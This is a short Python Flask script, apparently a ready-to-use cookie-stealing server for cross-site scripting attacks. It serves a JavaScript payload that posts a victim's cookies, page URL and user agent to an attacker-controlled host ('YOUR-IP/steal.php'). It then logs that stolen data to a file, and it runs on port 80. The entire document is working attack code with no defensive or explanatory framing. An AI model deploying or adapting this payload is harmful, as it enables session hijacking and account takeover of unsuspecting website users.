from flask import Flask, request, jsonify from flask_cors import CORS import datetime app = Flask(__name__) CORS(app) @app.route('/cookie.js') def serve_js(): return """ fetch('http://YOUR-IP/steal.php', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, page: window.location.href, userAgent: navigator.userAgent }), headers: { 'Content-Type': 'application/json' } }); """ @app.route('/steal.php', methods=['POST', 'OPTIONS']) def steal_cookies(): if request.method == 'OPTIONS': return jsonify({"status": "ok"}), 200 else: data = request.json with open("stolen_cookies.txt", "a") as f: f.write(f""" Time: {datetime.datetime.now()} Cookies: {data['cookies']} Page: {data['page']} User-Agent: {data['userAgent']} -------------------------- """) return jsonify({"status": "success"}), 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=80)